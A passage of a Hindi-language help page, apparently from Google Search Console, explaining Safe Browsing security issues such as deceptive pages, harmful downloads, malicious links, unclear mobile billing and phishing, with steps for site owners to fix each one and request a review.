पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
धोखाधड़ी के कॉन्टेंट वाले पेज
आपकी साइट पर ऐसा कॉन्टेंट मौजूद है जो साइट पर आने वाले लाेगाें काे गुमराह करता है. ऐसा करके, उनसे ऐसी गतिविधियां कराने की कोशिश की जाती है जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या सॉफ़्टवेयर डाउनलाेड करना शामिल है. Google सुरक्षित ब्राउज़िंग से वेब उपयाेगकर्ताओं काे चेतावनी देकर ऐसे पेजाें पर जाने से राेका जाता है जहां पर धोखाधड़ी वाला कॉन्टेंट दिखाया जाता है.
वेब पेजों पर धोखाधड़ी वाला कॉन्टेंट मौजूद है, ऐसा तब माना जाता है, जब वे:
- आपके डिवाइस या ब्राउज़र या किसी वेबसाइट जैसी किसी भराेसेमंद इकाई की नकल करते हैं या उस जैसा व्यवहार करते हैं या फिर
- आपको गुमराह करके ऐसा काम कराने की कोशिश करते हैं जाे आप सिर्फ़ किसी भराेसेमंद इकाई के लिए करेंगे. उदाहरण के लिए, कोई पासवर्ड शेयर करना, तकनीकी सहायता के किसी नंबर पर कॉल करना या सॉफ़्टवेयर डाउनलोड करना.
इस तरह के धोखाधड़ी वाले कॉन्टेंट को सोशल इंजीनियरिंग कहा जाता है. सोशल इंजीनियरिंग के बारे में ज़्यादा जानें या धोखाधड़ी के कॉन्टेंट वाले पेजों के उदाहरण देखें.
समस्या ठीक करना
1. समस्या का पता लगाएं
धोखाधड़ी वाले कॉन्टेंट का पता लगाने के लिए उदाहरण वाले पेजों पर जाएं. आप यूआरएल जांचने वाला टूल इस्तेमाल करके, अपनी साइट को मोबाइल और डेस्कटॉप दोनों वर्शन में देख सकते हैं.
2. पेजों में समस्याएं ठीक करें
जिन पेजों पर सोशल इंजीनियरिंग वाले कॉन्टेंट मौजूद हो उन्हें ठीक करें. अगर आपको लगता है कि सुरक्षित ब्राउज़िंग इस्तेमाल करके किसी वेब पेज की समस्या वाले पेज के तौर पर गलती से पहचान हुई है, तो कृपया यहां रिपोर्ट करें.
3. समीक्षा का अनुरोध करें
पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
धोखाधड़ी के लिए साइट में जोड़े गए रिसॉर्स
आपकी साइट में धोखाधड़ी वाले विज्ञापन या धोखाधड़ी के लिए जोड़े गए रिसॉर्स हैं. ये आपकी साइट पर आने वाले लाेगाें काे गुमराह करके ऐसी गतिविधियां कराने की कोशिश करते हैं जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या अनचाहे सॉफ़्टवेयर डाउनलाेड करना शामिल है. धोखाधड़ी वाला कॉन्टेंट, पेज में जोड़े किए गए रिसॉर्स के ज़रिए शामिल किया जा सकता है. उदाहरण के लिए, इमेज, तीसरे-पक्ष के कॉम्पोनेंट या विज्ञापन. Google सुरक्षित ब्राउज़िंग से वेब उपयाेगकर्ताओं काे चेतावनी देकर ऐसे पेजाें पर जाने से राेका जाता है जहां पर धोखाधड़ी वाला कॉन्टेंट दिखाया जाता है.
कभी-कभी उपयोगकर्ताओं को यह कॉन्टेंट होस्ट पेज पर दिखता है. दूसरे मामलों में, होस्ट साइट पर कोई भी विज्ञापन नहीं दिखता. हालांकि, पॉप-अप, पॉप-अंडर या दूसरी तरह के रीडायरेक्ट इस्तेमाल करके उपयाेगकर्ताओं काे नुकसान पहुंंचाने वाले पेजाें पर ले जाया जाता है. सभी मामलों में, साइट में ऐसा कॉन्टेंट जोड़ने पर, इसे होस्ट पेज के लिए नीति का उल्लंघन माना जाएगा.
इस तरह के धोखाधड़ी वाले कॉन्टेंट को सोशल इंजीनियरिंग कहा जाता है. सोशल इंजीनियरिंग के बारे में ज़्यादा जानें या धोखाधड़ी के लिए साइट में जोड़े गए रिसॉर्स के उदाहरण देखें.
समस्या ठीक करना
1. समस्या का पता लगाएं
धोखाधड़ी वाले कॉन्टेंट का पता लगाने के लिए उदाहरण वाले पेजों पर जाएं. इस बात की पुष्टि करें कि आपकी साइट के किसी भी पेज पर धोखाधड़ी वाला कोई विज्ञापन, इमेज या तीसरे पक्ष का एम्बेड किया गया कोई और रिसॉर्स मौजूद न हो. ध्यान रखें कि विज्ञापन नेटवर्क वाली कंपनियां, आपकी साइट पर दिखाए जाने वाले विज्ञापन बदल सकती हैं. इसलिए, साेशल इंजीनियरिंग वाले विज्ञापन देखने के लिए, हो सकता है कि आपको दो-चार बार पेज रीफ़्रेश करना पड़े. कुछ विज्ञापन, मोबाइल डिवाइस और डेस्कटॉप कंप्यूटर पर अलग-अलग तरह से दिख सकते हैं. आप यूआरएल की जांच करने वाला टूल इस्तेमाल करके, अपनी साइट को मोबाइल और डेस्कटॉप, दोनों वर्शन में देख सकते हैं.
2. धोखाधड़ी वाले विज्ञापनों या रिसॉर्स को साइट से हटाएं
अपनी साइट में शामिल तीसरे पक्ष के रिसॉर्स की जांच करें. देख लें कि आपकी साइट के किसी भी पेज पर मौजूद विज्ञापनों, इमेज या पेज पर जोड़े गए तीसरे पक्ष के रिसॉर्स में धोखाधड़ी वाला कॉन्टेंट शामिल न हो. साेशल इंजीनियरिंग के कॉन्टेंट वाले पेजों की समस्याएं ठीक करें.
3. समीक्षा का अनुरोध करें
पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
नुकसान पहुंचाने वाली फ़ाइलें
आपकी साइट, डाउनलोड कराने के लिए लोगों को ऐसी फ़ाइल उपलब्ध करा रही है जिसकी पहचान, Google सुरक्षित ब्राउज़िंग ने मैलवेयर या अनचाहे सॉफ़्टवेयर के तौर पर की है. जब उपयोगकर्ता आपकी साइट पर आएगा, तब Chrome ब्राउज़र चेतावनी दिखा सकता है. अगर आप यह चेतावनी हटाना चाहते हैं, तो आपको अपनी साइट से, डाउनलोड कराने के लिए उपलब्ध ऐसी फ़ाइलें हटानी होंगी.
1. समस्या का पता लगाएं
असामान्य रूप से डाउनलोड होने वाली फ़ाइलों की पुष्टि करने के लिए, अपनी साइट के कुछ पेजों की अच्छी तरह जांच कर लें.
2. समस्या का आकलन करें
- अगर ये फ़ाइलें जान-बूझकर साइट पर डाली गई हैं, तो इन्हें अपनी साइट से हटा दें और सीधे समीक्षा के लिए अनुरोध करें पर जाएं.
- अगर आपको साइट पर मौजूद इन फ़ाइलों के बारे में जानकारी नहीं है, तो हो सकता है कि आपकी साइट हैक कर ली गई हो. पहले आप हैक की गई अपनी साइट को ठीक करें. इसके बाद, इन फ़ाइलों को ढूंढें और अपनी साइट से हटा दें.
3. अपनी साइट से मैलवेयर हटाएं
अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक किए गए कॉन्टेंट को ठीक करने का तरीका बताने वाली गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे दोबारा हैक होने से बचाने की सलाह दी गई हैं. अपनी साइट से, हैक की गई फ़ाइलें हटाने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप बैक अप के तौर पर पहले सेव की गई, बिना मैलवेयर वाली फ़ाइलें उनकी जगह इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाला कॉन्टेंट हटा सकते हैं. अपनी साइट पर होस्ट की जा रही बाइनरी फ़ाइल और दूसरे कॉन्टेंट को स्कैन करने के लिए एंटीवायरस सॉफ़्टवेयर इस्तेमाल करें. एंटीवायरस सॉफ़्टवेयर कई तरह के मैलवेयर और अनचाहे सॉफ़्टवेयर का पता लगा सकता है. हालांकि, इससे हर तरह के मैलवेयर का पता नहीं लगाया जा सकता. किसी एंटीवायरस प्रोग्राम (या सभी तरह के वायरस की जानकारी इकट्ठा करने वाली सेवा, जैसे कि VirusTotal) से अपने सॉफ़्टवेयर की जांच करें. इस प्रोग्राम या सेवा से आपको पता चलेगा कि आपके सॉफ़्टवेयर में क्या समस्याएं हो सकती हैं. Google सुरक्षित ब्राउज़िंग की सुविधा में तय की गई शर्तों के मुताबिक यह जांच की जाती है कि कोई प्रोग्राम या बाइनरी फ़ाइल, अनचाहा सॉफ़्टवेयर या मैलवेयर है या नहीं.
4. समस्याओं को ठीक करने के बाद उनकी पुष्टि करें
पक्का करें कि आपकी साइट अनचाहे सॉफ़्टवेयर की नीति के मुताबिक सही हो.
5. समीक्षा का अनुरोध करें
पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
नुकसान पहुंचाने वाली साइटों के लिंक
आपकी साइट पर ऐसी साइटों के लिंक मौजूद हैं जिनकी पहचान, Google सुरक्षित ब्राउज़िंग ने मैलवेयर या अनचाहे सॉफ़्टवेयर के तौर पर की है. जब उपयोगकर्ता आपकी साइट पर आएगा, तब Chrome ब्राउज़र चेतावनी दिखा सकता है. अगर आप यह चेतावनी हटाना चाहते हैं, तो आपको अपनी साइट से, ऐसी साइटों के लिंक हटाने होंगे.
1. समस्या का पता लगाएं
असामान्य रूप से डाउनलोड होने वाली फ़ाइलों की पुष्टि करने के लिए, अपनी साइट के कुछ पेजों की अच्छी तरह जांच कर लें. कुछ मामलों में, अगर हैकर को पता चल जाता है कि आप साइट के मालिक हैं, तो वह ये लिंक छिपा सकता है. इसलिए, यूआरएल की जांच करने वाले टूल की मदद से सैंपल यूआरएल पर जाएं या किसी दूसरे खाते या कंप्यूटर से लॉग इन करें.
2. समस्या का आकलन करें
अगर ये लिंक जानबूझकर शामिल किए गए हैं, तो इन्हें अपनी साइट से हटा दें और सीधे समीक्षा के लिए अनुरोध करें पर जाएं.
अगर आपको इन लिंक के बारे में जानकारी नहीं है, तो शायद आपकी साइट हैक कर ली गई हो.
3. देखें कि क्या इस समस्या को ठीक किया जा सकता है
अगर आपकी साइट को हैक कर लिया गया है, तो इस समस्या को खुद ठीक करने की जानकारी पाने या इसके लिए मदद पाने का तरीका जानने के लिए, सहायता टीम बनाएं लेख पढ़ें.
4. अपनी साइट से मैलवेयर हटाएं
अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक किए गए कॉन्टेंट को ठीक करने का तरीका बताने वाली गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे दोबारा हैक होने से बचाने की सलाह दी गई हैं. अपनी साइट से नुकसान पहुंचाने वाली साइटों के लिंक हटाने के लिए, आप नुकसान पहुंचाने वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप बैक अप के तौर पर पहले सेव की गई, बिना मैलवेयर वाली फ़ाइलें उनकी जगह इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाला कॉन्टेंट हटा सकते हैं.
5. समस्याओं को ठीक करने के बाद उनकी पुष्टि करें
पक्का करें कि आपकी साइट अनचाहे सॉफ़्टवेयर की नीति के मुताबिक सही हो.
6. समीक्षा का अनुरोध करें
पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
मोबाइल पर खुलने वाले ऐसे पेज जिनमें शुल्क की नीतियों के बारे में साफ़ तौर पर नहीं बताया जाता
अगर Google को पता चलता है कि आपकी साइट में मोबाइल पर खुलने वाले ऐसे पेज हैं जिनमें शुल्क की नीतियों के बारे में उपयोगकर्ताओं को पूरी जानकारी नहीं दी जाती, तो Chrome पर इसके बारे में चेतावनी दिख सकती है. यह चेतावनी, शुल्क लेने वाले पेज के लोड होने से पहले दिखाई जाती है.
1. समस्या का पता लगाएं
यह जानने के लिए कि किन पेजों में इस शुल्क के बारे में अधूरी जानकारी दी गई है, रिपोर्ट में उदाहरण के तौर पर दिए गए यूआरएल देखें. मोबाइल पर खुलने वाले पेज पर लागू होने वाली शुल्क की नीतियों के बारे में दिशा-निर्देश यहां पढ़ें.
2. समस्या ठीक करें
अपने पेजों की समस्या हल करें, ताकि उन पर दी जाने वाली शुल्क की जानकारी, शुल्क की नीतियों से जुड़े दिशा-निर्देशों के मुताबिक हो.
3. समीक्षा का अनुरोध करें
जब आप यह पुष्टि कर देते हैं कि आपकी साइट की समस्या को ठीक कर लिया गया है, तब सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
उपयोगकर्ता के लॉग इन करने पर, संभावित फ़िशिंग का पता चलना
आपकी साइट के कुछ पेजों पर फ़िशिंग होने की संभावना है. जब किसी उपयोगकर्ता ने लॉगिन करने की कोशिश की, तो उसे पॉप-अप पासवर्ड फिर से इस्तेमाल करने की चेतावनी दिखी. ऐसे मामलों में, जब वेब उपयोगकर्ता किसी साइट पर अपना सेव किया हुआ पासवर्ड दोबारा इस्तेमाल करते हैं, तो Google सुरक्षित ब्राउज़िंग की मदद से, उन्हें साइट के बारे में चेतावनी दी जाती है, ताकि उनकी जानकारी सुरक्षित रखी जा सके
कभी-कभी हैकर, उपयोगकर्ताओं की जानकारी चुराने के लिए, धोखे से उन्हें ऐसे पेजों पर दोबारा पासवर्ड डालने के लिए कह सकते हैं जो आधिकारिक साइट के लॉगिन पेजों की तरह दिखते हैं. इस तरह की धोखाधड़ी वाले कॉन्टेंट को साेशल इंजीनियरिंग कहा जाता है. सोशल इंजीनियरिंग के बारे में ज़्यादा जानें या धोखाधड़ी के कॉन्टेंट वाले पेजों के उदाहरण देखें.
1. समस्या का पता लगाएं
फ़िशिंग वाले कॉन्टेंट का पता लगाने के लिए, उदाहरण वाले पेजों पर जाएं. आप यूआरएल की जांच करने वाले टूल का इस्तेमाल करके, अपनी साइट को मोबाइल और डेस्कटॉप, दोनों वर्शन में देख सकते हैं.
2. समस्या ठीक करें
जिन पेजों पर सोशल इंजीनियरिंग वाला कॉन्टेंट मौजूद है उन्हें ठीक करें. अगर आपको लगता है कि आपकी साइट हैक की गई है, तो हमारी हैक की गई साइटों को ठीक करने का तरीका बताने वाली सहायता गाइड देखें. अगर आपको लगता है कि सुरक्षित ब्राउज़िंग ने गलती से किसी वेब पेज को गड़बड़ी वाला पेज बताया है, तो कृपया यहां शिकायत करें.3. समीक्षा का अनुरोध करें
जब आप यह पुष्टि कर देते हैं कि आपकी साइट की समस्या को ठीक कर लिया गया है, तब सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते तक लग सकते हैं.
असामान्य रूप से डाउनलोड होने वाली फ़ाइलें
आपकी साइट पर, डाउनलोड करने के लिए ऐसी फ़ाइलें मौजूद हैं जिनकी Google सुरक्षित ब्राउज़िंग ने पहचान नहीं की है. ऐसे में Chrome ब्राउज़र यह चेतावनी दे सकता है कि ये फ़ाइलें असामान्य रूप से डाउनलोड हुई हैं और इनसे आपकी साइट को खतरा हो सकता है. अगर Google सुरक्षित ब्राउज़िंग से यह पुष्टि हो जाती है कि मौजूदा फ़ाइलें सुरक्षित हैं, तो ये चेतावनियां अपने-आप हट जाएंगी. ध्यान रखें कि इस समस्या के लिए, उदाहरण के तौर पर यूआरएल हमेशा नहीं दिए जाते हैं.
यह समस्या आपके पेज या साइट को Google Search के खोज नतीजों में दिखने से नहीं रोकेगी. हालांकि, जब उपयोगकर्ता अज्ञात फ़ाइलें डाउनलोड करने का अनुरोध करता है, तब यह Chrome ब्राउज़र में एक चेतावनी दिखाएगी.
1. समस्या ठीक करें
इस बात का पता लगाएं और पुष्टि करें कि आपकी डाउनलोड की गई फ़ाइलें, डाउनलोड करने के दिशा-निर्देशों के मुताबिक हैं या नहीं.
- अगर आपकी साइट से डाउनलोड की गई कोई भी फ़ाइल इन दिशा-निर्देशों का उल्लंघन करती है, तो उसे हटा दें.
- अगर डाउनलोड की जाने वाली किसी भी फ़ाइल से इन दिशा-निर्देशों का उल्लंघन नहीं होता है, तो आपको उसे हटाने की ज़रूरत नहीं है.
2. समीक्षा का अनुरोध करें
जब आप फ़ाइलें हटा लें (या यह पुष्टि करें कि आपकी डाउनलोड करने के लिए उपलब्ध कराई जाने वाली फ़ाइलें दिशा-निर्देशों के हिसाब से सही हैं), तब सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा करने का अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं. समीक्षा करने के अनुरोध के बिना भी, Google डाउनलोड की गई ज़्यादातर फ़ाइलों की जांच करता है और उन्हें 'स्वीकार की गई' या 'नुकसान पहुंचाने वाली' कैटगरी में रखता है. हालांकि, समीक्षा करने का अनुरोध करने से जांच करने की प्रक्रिया तेज़ हो जाती है.
मैन्युअल ऐक्शन की रिपोर्ट और सुरक्षा की समस्याओं वाली रिपोर्ट में क्या फ़र्क़ है?
मैन्युअल ऐक्शन की रिपोर्ट किसी ऐसे पेज या साइट में मैन्युअल तौर से पता लगाई गई समस्याओं की सूची बनाती है जो ज़्यादातर हमारे सर्च इंडेक्स में हेर-फेर करने की कोशिश करती हैं, लेकिन उपयोगकर्ताओं के लिए खतरनाक हों, ऐसा ज़रूरी नहीं है. यहां बताई गई ज़्यादातर समस्याएं ऐसी हैं जिनकी वजह से खोज नतीजों में पेज या साइट नीचे दिखने लगेगी या उन्हें खोज नतीजों से हटा दिया जाएगा. उपयोगकर्ता को इसका कोई संकेत नहीं मिलेगा.
सुरक्षा समस्याओं की रिपोर्ट सुरक्षा खतरों के संकेतों की सूची बनाती है. इस सूची से, आपकी साइट के हैक होने या उस पर ऐसा व्यवहार होने के बारे में पता चलता है जो वेबसाइट पर आने वालों या उनके कंप्यूटर को संभावित रूप से नुकसान पहुंचा सकता है. उदाहरण के लिए, फ़िशिंग हमला या उपयोगकर्ता के कंप्यूटर पर मैलवेयर या अनचाहा सॉफ़्टवेयर इंस्टॉल करना. खोज के नतीजों में इन पेजों के साथ चेतावनी का लेबल दिख सकता है या जब कोई उपयोगकर्ता इन पेजों पर जाने की कोशिश करता है, तब पेज खुलने से पहले उसे ब्राउज़र पर चेतावनी वाला पेज दिख सकता है.
